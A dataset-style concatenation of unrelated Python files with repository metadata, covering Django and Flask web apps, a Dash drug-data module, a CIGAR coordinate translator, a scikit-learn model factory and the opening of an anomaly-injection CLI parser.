base_url, end_url, html_class = self._getMeta()
label = m.group(2).strip()
a.set('title', label)
url = self.config['build_url'](label, base_url, end_url)
label_short = self.config['build_label'](label)
a.set('href', url)
if not self.config['url_exists'](url):
a.set('class', 'missing')
a.text = label
else:
a.text = label_short
else:
a = ''
return a
def _getMeta(self):
""" Return meta data or config data. """
base_url = self.config['base_url']
end_url = self.config['end_url']
html_class = self.config['html_class']
if hasattr(self.md, 'Meta'):
if 'wiki_base_url' in self.md.Meta:
base_url = self.md.Meta['wiki_base_url'][0]
if 'wiki_end_url' in self.md.Meta:
end_url = self.md.Meta['wiki_end_url'][0]
if 'wiki_html_class' in self.md.Meta:
html_class = self.md.Meta['wiki_html_class'][0]
return base_url, end_url, html_class
| ghtyrant/mdwiki | mdwiki/backend/extensions/mdwikilinks.py | mdwikilinks.py | py | 2,780 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "markdown.extensions.Extension",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "markdown.inlinepatterns.Pattern",
"line_number": 48,
"usage_type": "name"
},
{
"ap... |
17411415924 | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from driver.views import (
home,
DriverAddView,
DetailDriverView,
ListDriverView,
UserCreationView,
FieldNumberAddView
)
from driver.forms import LoginForm
from qr_code import urls as qr_code_urls
from django.contrib.auth import views as auth_views
urlpatterns = [
path('admin/', admin.site.urls),
path('', home,name="home"),
path('login/',auth_views.LoginView.as_view(template_name="driver/auth/login.html",form_class=LoginForm),name="login"),
path('signup/', UserCreationView.as_view(), name="signup"),
path('logout/',auth_views.LogoutView.as_view(template_name="driver/auth/logout.html"),name="logout"),
path('driver/add/',DriverAddView.as_view(), name="driver_add"),
path('driver/drivers/',ListDriverView.as_view(), name="driver_list"),
path('driver/<int:pk>/',DetailDriverView.as_view(), name="driver_detail"),
path('driver/<int:pk>/liscense/add/',FieldNumberAddView.as_view(), name="field_number"),
path('qr_code',include(qr_code_urls, namespace="qr_code"))
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL,
document_root=settings.STATIC_ROOT)
| miyanda2/Driver-Qr | mysite/urls.py | urls.py | py | 2,046 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "django.contrib.admin.site",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.admin",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "... |
27980503870 | #!/usr/bin/env python2
"""
Minimal Example
===============
Generating a square wordcloud from the US constitution using default arguments.
"""
from os import path
from wordcloud import WordCloud, STOPWORDS
d = path.dirname(__file__)
# Read the whole text.
text = open(path.join(d, 'titles.txt')).read()
# Generate a word cloud image
wordcloud = WordCloud(width=800, height=400,background_color="white", max_words=2000, margin=10,
stopwords=STOPWORDS.add("said"),max_font_size=40).generate(text)
# Display the generated image:
# the matplotlib way:
import matplotlib.pyplot as plt
plt.figure( figsize=(22,11) )
plt.imshow(wordcloud)
plt.axis("off")
plt.show()
# The pil way (if you don't have matplotlib)
#image = wordcloud.to_image()
#image.show() | schollz/scholar-pull | makeCloud.py | makeCloud.py | py | 769 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,... |
21476691969 | from urllib import quote
from django.shortcuts import get_object_or_404, render_to_response, redirect
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth.models import User
from django.contrib.auth import logout
from django.core import mail
from django.core.validators import validate_email
from django import forms
from datetime import datetime
from events.models import *
import facebook
ical = \
"""BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
DTSTART:{0}
DTEND:{1}
SUMMARY:{2}
LOCATION:{3}
DESCRIPTION:{4}
URL;VALUE=URI:http://www.facebook.com/event.php?eid={5}
BEGIN:VALARM
TRIGGER:-PT15M
DESCRIPTION:QRAttend event reminder
ACTION:DISPLAY
END:VALARM
END:VEVENT
END:VCALENDAR
"""
# convenience method to avoid strange AttributeError
# complaining the facebook object has no attribute graph
def fb(request):
try:
return request.facebook.graph
except AttributeError:
return False
def logged_in(request):
return request.user.is_authenticated and request.user.is_active
# returns event object with added start_dt and end_dt parameters for convenience
def start_end(event):
event["start_dt"] = datetime.strptime(event["start_time"], "%Y-%m-%dT%H:%M:%S")
event["end_dt"] = datetime.strptime(event["end_time"], "%Y-%m-%dT%H:%M:%S")
return event
# custom render function, vars is a dictionary, request is the request object
def render(template, vars, request):
c = RequestContext(request)
if fb(request) and logged_in(request):
vars["me"] = fb(request).get_object("me")
return render_to_response(template, vars, context_instance=c)
def home(request):
if fb(request) and logged_in(request):
fbuser = fb(request).get_object("me")
events = fb(request).get_connections("me", "events")
real_events = []
now = datetime.now()
db_events = []
db_event_ids = []
for db_event in FacebookEvent.objects.filter(facebook_user_id=fbuser["id"]):
db_event_ids.append(db_event.facebook_event_id)
new_db_event = fb(request).get_object(db_event.facebook_event_id)
new_db_event = start_end(new_db_event)
db_events.append(new_db_event)
for event in events["data"]:
event = start_end(event)
if event["rsvp_status"] == u'attending' and event["start_dt"] > now:
new_event = fb(request).get_object(event["id"])
new_event = start_end(new_event)
if new_event["owner"]["id"] == fbuser["id"] and new_event["privacy"] == u'OPEN' and not new_event["id"] in db_event_ids:
real_events.append(new_event)
return render('events.html', {'me':fbuser, 'events':real_events, 'db_events':db_events}, request)
else:
return render('index.html', {}, request)
def logout_view(request):
logout(request)
return redirect(home)
def mobile(request, event_id):
c = RequestContext(request)
api = facebook.GraphAPI()
event = api.get_object(event_id)
event = start_end(event)
success = request.GET.__contains__('success')
return render('mobile.html', {'event':event, 'success':success}, request)
def event(request,event_id):
c = RequestContext(request)
try:
event_obj = FacebookEvent.objects.get(facebook_event_id=event_id)
except FacebookEvent.DoesNotExist:
if fb(request) and logged_in(request):
fbuser = fb(request).get_object("me")
fbevent = fb(request).get_object(event_id)
if fbevent["owner"]["id"]==fbuser["id"]: #create a QR code
event_obj = FacebookEvent(facebook_event_id=event_id,facebook_user_id=fbuser["id"])
event_obj.save()
if event_obj:
event = fb(request).get_object(event_id)
event = start_end(event)
return render('event.html', {'event_id':event_id,'event_obj':event}, request)
else:
return render('no_event.html', {}, request)
def email(request, event_id):
if request.method == "POST":
try:
addr = request.POST["email"].strip()
validate_email(addr)
api = facebook.GraphAPI()
event = api.get_object(event_id)
content = ical.format("".join("".join(event["start_time"].split("-")).split(":")),
"".join("".join(event["end_time"].split("-")).split(":")),
event["name"], event["location"], event["description"],
event["id"])
email = mail.EmailMessage('Event from QR Attend!', 'Hey there. Attached is the iCal event for {0}'.format(event["name"]),
to=[addr])
email.attach("fbevent.ics", content, "text/calendar")
email.send()
return redirect('/m/'+event_id+"?success")
except forms.ValidationError:
return redirect('/m/'+event_id+"/?email="+quote(addr))
| sherbondy/Attend | attend/events/views.py | views.py | py | 5,143 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "datetime.datetime.strptime",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 48,
"usage_type": "call"
},
{
"api_name"... |
34082247012 | import traceback
import logger as log
import pandas as pd
from datetime import (
datetime
)
from database import (
DrugsMetaCollection,
IngredientsCollection,
LyophilizedCollection
)
from dash import (
html,
dcc
)
class MongoData(object):
def __init__(self):
self._ingredients_db_obj = None
self._lyophilized_db_obj = None
@property
def ingredients_db_obj(self):
if not self._ingredients_db_obj:
self._ingredients_db_obj = IngredientsCollection()
return self._ingredients_db_obj
@property
def lyophilized_db_obj(self):
if not self._lyophilized_db_obj:
self._lyophilized_db_obj = LyophilizedCollection()
return self._lyophilized_db_obj
def sanitize_list(self, item):
if not isinstance(item, list):
result = list()
result.append(item)
return result
return item
def get_table_data(self, start_date=None, end_date=None, product_search=None, active_search=None, inactive_search=None):
search_query = dict()
result = list()
if product_search:
result.extend(self.sanitize_list(product_search))
search_query.update({
'products': {'$in': result}
})
elif active_search:
result.extend(self.sanitize_list(active_search))
search_query.update({
'active_ingredients_list': {'$in': result}
})
elif inactive_search:
result.extend(self.sanitize_list(inactive_search))
search_query.update({
'inactive_ingredients_list': {'$in': result}
})
if not (start_date or search_query):
today = datetime.today()
start_date = datetime(today.year, today.month, 1)
##
## For Testing purposes, using start date from Jan 1, 2022.
##
start_date = datetime(2022, 1, 1)
search_query.update({'date': {'$gte': start_date}})
if end_date:
search_query['date'].update({
'$lt': end_date
})
records_rows = list()
record_id = None
try:
for records in self.lyophilized_db_obj.get_records(query=search_query):
record_id = records.get('_id')
labels_rows = list()
active_ingredients_rows = list()
active_strength_rows = list()
inactive_ingredients_rows = list()
inactive_strength_rows = list()
for setid, labels in records.get('set_ids', {}).items():
row = list()
active = records.get('active_ingredients', {}).get(setid, [])
inactive = records.get('inactive_ingredients', {}).get(setid, [])
active_len = len(active)
inactive_len = len(inactive)
row_span = max(active_len, max(inactive_len, 0))
if row_span == 0:
continue
row.append(dcc.Markdown(f"[{labels.get('title')}]({labels.get('web_url')})"))
row.append(row_span)
labels_rows.append(row)
for i in range(1, row_span):
labels_rows.append(list())
for i in range(0, row_span):
active_name_row = ["", 1]
active_strength_row = ["", 1]
inactive_name_row = ["", 1]
inactive_strength_row = ["", 1]
if i < active_len:
active_name_row = [active[i].get('name', ""), 1]
active_strength_row = [active[i].get('strength', ""), 1]
if i < inactive_len:
inactive_name_row = [inactive[i].get('name', ""), 1]
inactive_strength_row = [inactive[i].get('strength', ""), 1]
active_ingredients_rows.append(active_name_row)
active_strength_rows.append(active_strength_row)
inactive_ingredients_rows.append(inactive_name_row)
inactive_strength_rows.append(inactive_strength_row)
total_span = len(labels_rows)
if total_span <= 0:
total_span = 1
app_number = records.get('application_number')
app_list = [app_number, total_span]
product_outer_list = list()
for product in records.get('products', []):
product_rows = [product.upper(), html.Br()]
product_rows.append(app_number)
product_outer_list = [product_rows, total_span, "products"]
date_rows = list()
if not start_date:
date_value = list()
for date in records.get('date'):
date_value.append(date.strftime('%m-%d-%Y'))
date_value.append(html.Br())
else:
date_value = ""
for date in records.get('date'):
if date.year >= start_date.year and date.month >= start_date.month:
if end_date:
if date.year <= end_date.year and date.month <= end_date.month:
date_value = date.strftime('%m-%d-%Y')
break
else:
date_value = date.strftime('%m-%d-%Y')
break
date_rows = [date_value, total_span, "dates"]
company_rows = [records.get('company'), total_span]
current_row = [date_rows, product_outer_list, company_rows]
for i in range(0, len(labels_rows)):
if labels_rows[i]:
current_row.append(labels_rows[i])
current_row.extend([active_ingredients_rows[i], active_strength_rows[i]])
current_row.extend([inactive_ingredients_rows[i], inactive_strength_rows[i]])
records_rows.append(current_row)
current_row = list()
except Exception as exc:
log.do_error(f"Exception occurred while fetching records from database for record: {record_id}, error: {str(exc)}, traceback: {traceback.format_exc()}")
return records_rows
def get_search_bar_data(self):
products = set()
active_ingredients = set()
inactive_ingredients = set()
for records in self.lyophilized_db_obj.get_records():
products.update(set(records.get('products', [])))
active_ingredients.update(set(records.get('active_ingredients_list', [])))
inactive_ingredients.update(set(records.get('inactive_ingredients_list', [])))
return (list(products), list(active_ingredients), list(inactive_ingredients))
def generate_occurences_data(self):
try:
active_ingredients_dict = dict()
inactive_ingredients_dict = dict()
products_set = set()
for record in self.lyophilized_db_obj.get_records():
products = record.get('products', [])
active_ingredients = record.get('active_ingredients_list', [])
inactive_ingredients = record.get('inactive_ingredients_list', [])
date = record.get('date', [])[0]
date_value = date.strftime('%Y')
for product in products:
for ingredient in active_ingredients:
id = product + ingredient
if id not in products_set:
products_set.add(id)
existing_val = active_ingredients_dict.get(ingredient, {}).get(date_value, 0)
total_val = active_ingredients_dict.get(ingredient, {}).get('total_count', 0)
if active_ingredients_dict.get(ingredient):
active_ingredients_dict[ingredient].update({date_value: existing_val + 1})
active_ingredients_dict[ingredient].update({'total_count': total_val + 1})
else:
active_ingredients_dict[ingredient] = {}
active_ingredients_dict[ingredient].update({date_value: 1})
active_ingredients_dict[ingredient].update({'total_count': 1})
for ingredient in inactive_ingredients:
id = product + ingredient
if id not in products_set:
products_set.add(id)
existing_val = inactive_ingredients_dict.get(ingredient, {}).get(date_value, 0)
total_val = inactive_ingredients_dict.get(ingredient, {}).get('total_count', 0)
if inactive_ingredients_dict.get(ingredient):
inactive_ingredients_dict[ingredient].update({date_value: existing_val + 1})
inactive_ingredients_dict[ingredient].update({'total_count': total_val + 1})
else:
inactive_ingredients_dict[ingredient] = {}
inactive_ingredients_dict[ingredient].update({date_value: 1})
inactive_ingredients_dict[ingredient].update({'total_count': 1})
except Exception as exc:
log.do_error(f"Exception occurred while fetching ingredients from Database, error: {str(exc)}")
return {'active': active_ingredients_dict, 'inactive': inactive_ingredients_dict}
def get_timeseries_dataframe(self):
time_series_data = self.generate_occurences_data()
inactive_list = list()
inactive_ing_list = list()
active_list = list()
active_ing_list = list()
inactive_dates_list = list()
active_dates_list = list()
inactive_occ_list = list()
active_occ_list = list()
active_total_count = list()
inactive_total_count = list()
for ingredient, value in time_series_data.get('active', {}).items():
active_ing_list.append(ingredient)
for key, count in value.items():
if key == "total_count":
active_total_count.append(count)
else:
active_dates_list.append(int(key))
active_list.append(ingredient)
active_occ_list.append(count)
for ingredient, value in time_series_data.get('inactive', {}).items():
inactive_ing_list.append(ingredient)
for key, count in value.items():
if key == "total_count":
inactive_total_count.append(count)
else:
inactive_dates_list.append(int(key))
inactive_list.append(ingredient)
inactive_occ_list.append(count)
active_time_series = pd.DataFrame({
"Ingredient": active_list,
"Year": active_dates_list,
"Occurences": active_occ_list
})
inactive_time_series = pd.DataFrame({
"Ingredient": inactive_list,
"Year": inactive_dates_list,
"Occurences": inactive_occ_list
})
active_chart = pd.DataFrame({
"Ingredient": active_ing_list,
"Occurences": active_total_count
})
inactive_chart = pd.DataFrame({
"Ingredient": inactive_ing_list,
"Occurences": inactive_total_count
})
active_time_series = active_time_series.sort_values(by=['Year'])
inactive_time_series = inactive_time_series.sort_values(by=['Year'])
active_chart = active_chart.sort_values(by=['Occurences'])
inactive_chart = inactive_chart.sort_values(by=['Occurences'])
return (active_chart, inactive_chart, active_time_series, inactive_time_series) | ashwani1310/Lyophilized-Drugs-Analysis-Tool | ui_data.py | ui_data.py | py | 12,601 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "database.IngredientsCollection",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "database.LyophilizedCollection",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.today",
"line_number": 63,
"usage_type": "call"
},
{
... |
18909708203 | """
Description:
A tool for translating transcript coordinates to reference coordinates using the CIGAR string.
Contributors:
20210119 - Larry Clos II (drlclos@gmail.com)
Assumptions:
- For a given genetic sequence (transcript) the sequence coordinate and index are the same and start at zero (0).
- CIGAR defines the the order and size of transcript alignment events over the range of a padded reference string ,
but certain events may not map to unpadded reference coordinates.
- CIGAR operators are preceded by non-zero integers.
- CIGAR strings never start with an Insertion or Deletion operator.
- There is a 1:1 coordinate/index mapping for reference and transcript sequence strings in (mis)match event regions
(i.e. map between characters).
- There is not a 1:1 coordinate/index mapping for transcript regions not mapped to the unpadded reference (insertions)
or for reference regions missing from the transcript (deletions).
- If queried, transcript insertions or reference deletions should map to the closest upstream (mis)match position
(left-aligned) within the compared strand.
- A reference coordinate can be translated from a transcript coordinate query with the following formula:
<ref start position> + <transcript coordinate query> + sum(<relative indel event sizes in prior coordinates>)
Usage:
$python translate_coordinates.py <path to transcript alignments> <path to coordinate queries> <path to output file>
Test:
$python -m doctest -v translate_coordinates.py
"""
import csv
import re
import sys
from collections import namedtuple
from typing import List, Tuple, Union
# namedtuple for input transcripts is lightweight, memory efficient alternative to creating full class
Transcript = namedtuple('Transcript', 'name chromosome ref_start cigar transcript_length index_map')
def cigar_to_operators(cigar: str) -> List[Tuple[int, str]]:
"""Isolate individual CIGAR operators and their numeric values.
>>> cigar_to_operators('8M7D6M2I2M11D7M')
[(8, 'M'), (7, 'D'), (6, 'M'), (2, 'I'), (2, 'M'), (11, 'D'), (7, 'M')]
>>> cigar_to_operators('X8M7D6M2I2M11D7M12')
[(8, 'M'), (7, 'D'), (6, 'M'), (2, 'I'), (2, 'M'), (11, 'D'), (7, 'M')]
>>> cigar_to_operators('8M7D6M2I2M11D7M12Q')
[(8, 'M'), (7, 'D'), (6, 'M'), (2, 'I'), (2, 'M'), (11, 'D'), (7, 'M')]
Args:
cigar: CIGAR string representing relative alignment of a transcript to a reference.
Returns:
A list of tuples, each being (<size of alignment type (integer)>, <CIGAR operator code (string)>).
"""
re_cigar = list((int(c[:-1]), c[-1]) for c in re.findall(r'[0-9]+[MIDNSHP=X]', cigar))
return re_cigar
def get_length(cigar: str) -> int:
"""Deduce the length of a transcript from its CIGAR string.
>>> get_length('2M2X4M7D6M2I2M11D7M')
25
>>> get_length('2M2X4M7D6M2I2M11D7M12Q')
25
Args:
cigar: CIGAR string representing relative alignment of a transcript to a reference.
Returns:
Integer value of the length of the transcript.
"""
re_cigar = cigar_to_operators(cigar)
length = sum(o[0] for o in re_cigar if o[1] not in ['D', 'N', 'H', 'P'])
return length
def make_index_map(cigar: str) -> List[Tuple[int, int]]:
"""
Transform CIGAR operators to an effective, efficient, and convenient data structure that maps the relative index of
CIGAR alignment events that alter the 1:1 correspondence of transcript and reference coordinates (indexes).
>>> make_index_map('8M7D6M2I2M11D7M')
[(7, 7), (13, -2), (17, 11)]
>>> make_index_map('2M2X4M7D6M2I2M11D7M')
[(7, 7), (13, -2), (17, 11)]
>>> make_index_map('2M2X2I2M')
[(3, -2)]
Design:
- The index map assumes the transcript coordinate and index are the same and start at zero (0).
- (Mis)matches don't alter index/coordinate map, hence need not be encoded, saving memory and computation.
- Index map entries have the index of a left-aligned indel event 'a', and the associated event size 'b'
such that:
- any query > 'a' must add 'b' to the reference coordinate.
- an insertion event has a negative 'b' to prevent advance of reference coordinate from transcript index.
- sum of all 'b's for entries whose 'a' < query gives the total coordinate adjustment for indel events.
- queries found in insertion regions need adjustment by amount of query index extending into region.
Args:
cigar: CIGAR string representing relative alignment of a transcript to a reference.
Returns:
A list of tuples, each being...
(<index of position immediately prior to indel (left-aligned)>, <indel length a.k.a. coordinate adjust>).
"""
re_cigar = cigar_to_operators(cigar)
# TODO: can add model build for reference as well
transcript_index_map = []
ref_size = 0
trans_size = 0
for size, code in re_cigar:
if code in ['M', '=', 'X']:
ref_size += size
trans_size += size
continue
if code in ['D', 'N']:
ref_size += size
transcript_index_map.append((trans_size - 1, size))
elif code in ['I', 'S']:
transcript_index_map.append((trans_size - 1, -size))
trans_size += size
# TODO: consider nuance from other operators
return transcript_index_map
def translate_coordinate(coordinate_query: int,
index_map: List[Tuple[int, int]],
ref_start: int,
transcript_length: int) -> Union[int, None]:
"""Determine the reference coordinate (index) of input coordinate query from transcript index map and parameters.
>>> [translate_coordinate(n, [(7, 7), (13, -2), (17, 11)], 3, 25) for n in [0, 13, 14, 15, 16, 24]]
[3, 23, 23, 23, 24, 43]
Nothing should be returned from below...
>>> translate_coordinate(25, [(7, 7), (13, -2), (17, 11)], 3, 25)
Args:
coordinate_query: Transcript position (index) to traslate to reference coordinate.
index_map: A list of tuples, each being...
(<index of position immediately prior to indel (left-aligned)>, <indel length>).
ref_start: Reference position that aligns with transcript index 0.
transcript_length: Length of transcript.
Returns:
Reference coordinate, or None when query outside of transcript index range.
"""
# Confirm query is possible with given transcript length
if coordinate_query >= transcript_length or coordinate_query < 0:
return None
# Calculate reference coordinate for query
mapped_adjusts = list(a for a in index_map if coordinate_query > a[0])
ref_coord = sum([ref_start,
coordinate_query,
sum(a[1] for a in mapped_adjusts)])
# Adjust insertions to return left-aligned reference coordinate
if mapped_adjusts and mapped_adjusts[-1][1] < 0:
last_adjust = mapped_adjusts[-1]
diff = last_adjust[0] - coordinate_query - last_adjust[1]
if diff > 0:
ref_coord += diff
return ref_coord
def main(transcripts: str, queries: str, output: str) -> None:
"""Translate input transcript coordinate queries to reference coordinates (all 0-based).
Args:
transcripts: Path to input TSV file containing the transcripts, with columns for transcript name, chromosome,
starting position, and CIGAR mapping string.
queries: Path to input TSV file with a set of queries, with columns for transcript name and transcript
coordinate to translate to reference coordinate.
output: Path to output TSV file to write query results, with columns for transcript name, transcript
coordinate, chromosome, and reference coordinate determined from query.
"""
# Parse inputs and preprocessing (precompute reused parameters)
transcript_alignments = {}
with open(transcripts, 'r') as f:
for t in list(csv.reader(f, delimiter='\t')):
transcript_alignments[t[0]] = Transcript(name=t[0],
chromosome=t[1],
ref_start=int(t[2]),
cigar=t[3],
transcript_length=get_length(t[3]),
index_map=make_index_map(t[3]))
with open(queries, 'r') as q:
raw_queries = list(csv.reader(q, delimiter='\t'))
# Process queries and
with open(output, 'w', newline='') as w:
query_output = csv.writer(w, delimiter='\t')
for transcript_name, query in raw_queries:
query = int(query)
transcript = transcript_alignments[transcript_name]
ref_coord = translate_coordinate(coordinate_query=query,
index_map=transcript.index_map,
ref_start=transcript.ref_start,
transcript_length=transcript.transcript_length)
if ref_coord is None:
raise ValueError(f'Transcript {transcript_name} has no coordinate (index) {query}')
query_output.writerow([transcript_name, query, transcript.chromosome, ref_coord])
if __name__ == '__main__':
"""Execute translate_coordinates module from CLI."""
main(*sys.argv[1:])
import doctest
doctest.testmod()
| LClos/bfx_tools | genetic_coordinates/cigar_translate.py | cigar_translate.py | py | 9,659 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.namedtuple",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "typing.List",
"line_number": 47,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"lin... |
9353725368 | import os
import atexit
import dotenv
from dotenv import load_dotenv
from flask import Flask
from flask import render_template, request, url_for, flash, redirect
from flask_bootstrap import Bootstrap5
from mexc_sdk import Spot
from agents import TradingAgent
from clients import MexcClient
def to_float(x):
try:
return float(x)
except:
return None
load_dotenv('.env')
client = MexcClient(
Spot(
os.environ.get('a_k'),
os.environ.get('s_k')
)
)
app = Flask(__name__)
app.secret_key = os.environ.get('s_k')
bootstrap = Bootstrap5(app)
coins = {}
@app.route("/", methods=('GET', 'POST'))
def index():
if request.method == 'POST':
# validate ticker
ticker = request.form['ticker']
summa = to_float(request.form['summa'])
mul_buy = to_float(request.form['mul_buy'])
mul_sell = to_float(request.form['mul_sell'])
if not ticker:
flash('Заполни название пары')
elif not client.is_valid_ticker(ticker):
flash('Данной пары нет на бирже')
#validate trading volume
elif not summa:
flash('Введите сумму торговли')
elif client.get_balance('USDT')['free'] - sum(c['summa'] for k, c in coins.items()) - summa < 0:
flash('Недостаточно средств')
#validate buy multiply coeff
elif not mul_buy:
flash('не задан коэффциент для цены покупки')
#validate buy multiply coeff
elif not mul_sell:
flash('не задан коэффциент для цены покупки')
else:
if ticker not in coins:
coins[ticker] = {
'summa': summa,
'agent': TradingAgent(client, ticker, summa, mul_buy, mul_sell)
}
coins[ticker]['agent'].start()
return render_template('index.html', coins=coins)
return render_template('index.html', coins=coins)
@app.route("/remove/<string:id>", methods = ['POST'])
def remove(id):
coins[id]['agent'].stop_event.set()
coins.pop(id)
return redirect(url_for('index'))
@app.route("/settings", methods=('GET', 'POST'))
def settings():
if request.method == 'POST':
dotenv.set_key('.env', "a_k", request.form['a_k'])
dotenv.set_key('.env', "s_k", request.form['s_k'])
return redirect(url_for('index'))
return render_template('settings.html')
def close_running_threads():
print('Остановлено пользователем')
for v in coins.values():
v['agent'].stop_event.set()
if __name__ == '__main__':
atexit.register(close_running_threads)
app.run(debug=True)
| ArtemNechaev/traderbot | app.py | app.py | py | 2,908 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "clients.MexcClient",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "mexc_sdk.Spot",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
... |
40328938266 | from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.multioutput import MultiOutputClassifier
from data.tokenizer import tokenize
from sklearn.preprocessing import OneHotEncoder
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
import os
import joblib
class SplitFeatures(BaseEstimator, TransformerMixin):
"""
Splitt the features in different columns
"""
def __init__(self,start, end = None):
self.start = start
self.end = end
def fit(self, x, y=None):
return self
def transform(self, all_features):
if self.end:
return all_features[:, self.start:self.end].copy()
else:
return all_features[:, self.start]
def get_model_pipeline(model_name: str):
"""
Get the model pipeline and the search parameters for the model
:param model_name: str
Name of the model to use
:return: tuple
scikit-Learn Pipeline of the model, parameters of the model
"""
if model_name is "random_forest":
pipline = Pipeline([("feature", FeatureUnion([
("nlp", Pipeline([
("split", SplitFeatures(start=0)),
("vect", CountVectorizer(tokenizer=tokenize)),
("tfidf", TfidfTransformer())
])),
("dummy", Pipeline([
("split", SplitFeatures(start=1, end=2)),
("encoder", OneHotEncoder(sparse=True))
]))
])),
("clf", MultiOutputClassifier(RandomForestClassifier()))])
parameters = {
"feature__nlp__vect__ngram_range": [(1, 1), (1, 2)],
"feature__nlp__vect__min_df": [3, 5, 10],
"clf__estimator__n_estimators": [100],
"clf__estimator__min_samples_split": [ 4, 6]
}
return pipline, parameters
elif model_name is "logistic_regression":
pipline = Pipeline([
("split", SplitFeatures(start=0)),
("vect", CountVectorizer(tokenizer=tokenize)),
("tfidf", TfidfTransformer()),
("clf", MultiOutputClassifier(LogisticRegression()))])
parameters = {
"vect__ngram_range": [(1, 1), (1, 2)],
"vect__min_df": [3, 5, 10]
}
return pipline, parameters
else:
raise ValueError("The model {} is not known, please create a model")
def build_model(model_name: str, n_jobs = 1, cv = 5):
"""
Choose a model from the model factory and create a grid search object.
:param model_name: str
model name for the model in the model factory.
:param n_jobs: int
number of jobs for multi processing.
:param cv: int
number of folds for cross validation.
:return:
grid search model object.
"""
pipeline, parameters = get_model_pipeline(model_name)
gv = GridSearchCV(pipeline, param_grid=parameters, n_jobs=n_jobs, cv=cv, scoring="f1_macro")
return gv
def load_model(model_path: str, model_name: str):
"""
Load the pickle file with a trained scikit-learn pipeline.
:param model_path:
:param model_name:
:return:
"""
complete_model_filename = os.path.join(model_path, model_name)
if os.path.isfile(complete_model_filename):
model = joblib.load(complete_model_filename)
return model
else:
raise ValueError("The provided filepath is not correct.") | DietzRep/disaster_response_pipeline_project | models/model_factory.py | model_factory.py | py | 3,650 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.base.BaseEstimator",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "sklearn.base.TransformerMixin",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "sklearn.pipeline.Pipeline",
"line_number": 41,
"usage_type": "call"
},
{
... |
74207450663 | import argparse
import logging
from .system import system_parser
from .network import network_parser
from .stress import stress_parser
log_debug = logging.getLogger("debugLog")
def get_parser(parent=None):
# connection with main parser
if not parent:
anomaly_inject = argparse.ArgumentParser(description='Anomaly Injection', prog='anomaly')
anomaly_inject.add_argument("--debug", help="Run command in debug mode", dest="debug", action='store_true')
else:
anomaly_inject = parent.add_parser('anomaly', help='Anomaly Injection')
# Anomaly commands
anomaly_parser = argparse.ArgumentParser(add_help=False)
anomaly_parser.add_argument('--host', help='Hostname or ip of target', metavar='[hostname]', dest="target_host")
# Anomaly parsers
anomaly_subcommands = anomaly_inject.add_subparsers(dest="target")
anomaly_container = anomaly_subcommands.add_parser('container', prog='container',
parents=[anomaly_parser],
usage=f"{anomaly_inject.prog} %(prog)s",
description="Container anomaly injector, "
"must specify host and name or id")
anomaly_node = anomaly_subcommands.add_parser('node', prog='node', usage=f"{anomaly_inject.prog} %(prog)s",
parents=[anomaly_parser],
description="Node anomaly injector, "
"must specify host and name or id")
anomaly_network = anomaly_subcommands.add_parser('network', prog='network', usage=f"{anomaly_inject.prog} %(prog)s",
parents=[anomaly_parser],
description="Network anomaly injector, "
"must specify host and interface ")
anomaly_network.add_argument('--interface', help='Name of interface', type=str, metavar='[NAME]',
dest="target_interface")
anomaly_deployment = anomaly_subcommands.add_parser('deployment', prog='deployment',
usage=f"{anomaly_inject.prog} %(prog)s",
parents=[anomaly_parser],
description="Deployment anomaly injector, "
"must specify host and name or id")
# Container Anomaly
a_c_group = anomaly_container.add_mutually_exclusive_group(required=True)
a_c_group.add_argument('--name', '-n', help='Name of container', type=str, metavar='[name]', dest="target_name")
a_c_group.add_argument('--id', help='Container ID', type=str, metavar='[id]', dest="target_id")
cont_anomalies = anomaly_container.add_subparsers(dest="anomaly_type")
cont_system = cont_anomalies.add_parser("system", parents=[system_parser])
